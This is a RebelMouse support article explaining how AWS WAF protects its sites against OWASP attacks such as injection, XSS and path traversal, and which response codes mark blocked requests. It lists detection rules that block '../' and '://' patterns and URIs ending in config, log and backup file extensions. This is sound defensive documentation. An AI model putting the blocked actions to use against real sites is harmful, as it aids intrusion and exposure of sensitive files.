Amazon Web Services's (AWS) Web Application Firewall (WAF) is a firewall that helps protect your web applications (or APIs) against common web exploits that may affect availability, compromise security, or consume excessive resources. AWS WAF gives RebelMouse developers control over how traffic reaches our applications by enabling us to create security rules that block common attack patterns, such as SQL injections or cross-site scripting (XSS), and rules that filter out specific traffic patterns we have defined. These rules are regularly updated when new issues emerge as well.
With AWS WAF, we're making sure that all our sites are covered against some of the most common attacks , as defined by The Open Web Application Security Project (OWASP). The project is an online community that creates freely available articles, methodologies, documentation, tools, and technologies in the field of web application security.
Possible Common Attacks
Injections: Injection flaws allow attackers to relay malicious code through an application to another system. These attacks include calls to the operating system via system calls, the use of external programs via shell commands, as well as calls to back-end databases via SQL (e.g., SQL injection). Whole scripts written in Perl, Python, and other languages can be injected into poorly designed applications and executed. Any time an application uses an interpreter of any type, there is a danger of introducing an injection vulnerability.
For example, if somebody tries to inject some JavaScript into your site, we can block this automatically to avoid the insert.
Protection for Cross-Site Scripting: Cross-site scripting flaws occur when web applications include user-provided data in webpages that are sent to the browser without proper sanitization. If the data isn't properly validated or escaped, an attacker can use these vectors to embed scripts, inline frames (iframes), or other objects into the rendered page. These, in turn, can be used for a variety of malicious purposes, including stealing user credentials by using keyloggers, to install system malware. The impact of the attack is magnified if that user data persists server side in a data store, and then is delivered to a large set of other users.
Consider the example of a common, but popular, blog that accepts user comments. If user comments aren't correctly sanitized, a malicious user can embed a malicious script in the comments, such as:
The code then gets executed anytime a legitimate user loads that blog article.
Broken Access Control: This category of application flaw covers the lack of, or improper enforcement of, restrictions on what authenticated users are allowed to do. AWS WAF can filter dangerous HTTP request patterns that can indicate path traversal attempts, or remote and local file inclusion (RFI/LFI). AWS WAF validates if HTTP request components contain ../ or ://.
This helps us avoid malicious attackers exploiting vulnerabilities, including when a user can access some resource or perform some action that they are not supposed to be able to access.
How AWS WAF Protects Our Servers From Attacks
Insufficient Attack Protection: AWS WAF enforces a level of hygiene for inbound HTTP requests. Size constraint conditions help to build rules that ensure that components of HTTP requests fall within specifically defined ranges. We can use these rules to avoid processing abnormal requests. An example is to limit the size of URIs or query strings to values that make sense to our application.
In our case, we're limiting the URI and QUERY_STRING bytes.
Using Components With Known Vulnerabilities: AWS WAF filters and blocks HTTP requests to the functionality of components that are not in use in applications. This helps reduce the attack surface of those components if vulnerabilities are discovered in functionality you're not using.
AWS WAF matches URIs to filenames that end with:
- .cfg
- .conf
- .config
- .ini
- .log
- .bak
- .backup
The HTTP request component:
- URI
We're setting up a mechanism to mitigate known vulnerabilities in components that addresses the lifecycle of such components. We identify and track the dependencies of our application, as well as the dependencies of the underlying components. This way, we can monitor the processes in place to track the security of these components.
Robots.txt Crawl-Delay Directive: Aside from the AWS WAF protection mechanisms, we have also included a directive into our default robots.txt files called crawl-delay.
The crawl-delay directive is meant to communicate to crawlers to slow down crawling in order to not overload the web server. On our pages, we have it set to 0.1 seconds. This is the default setting for our robots.txt file. Clients can override the crawl-delay directive in our Layout & Design Tool , and if you have already made manual changes to your file previously, we recommend that you check and add this manually. You can also modify the crawl-delay for you.
Overall, this server protection allows us to automatically block repeated requests to our sites so that we can identify malicious attacks and block them right away. Based on what code is returned, you will be able to tell why the requests were blocked:
- 429: Too many requests have been made.
-
406:
The status code for OWASP risks.
- The response message will contain a code that matches a specific type of vulnerability. We use another set of codes to hide our protection logic from public users, but are able to share with you what each one means as needed. The following screenshot shows how this looks:
If you have any questions, please reach out to your account manager or email us at support@rebelmouse.com , and we'll help you solve your particular use case.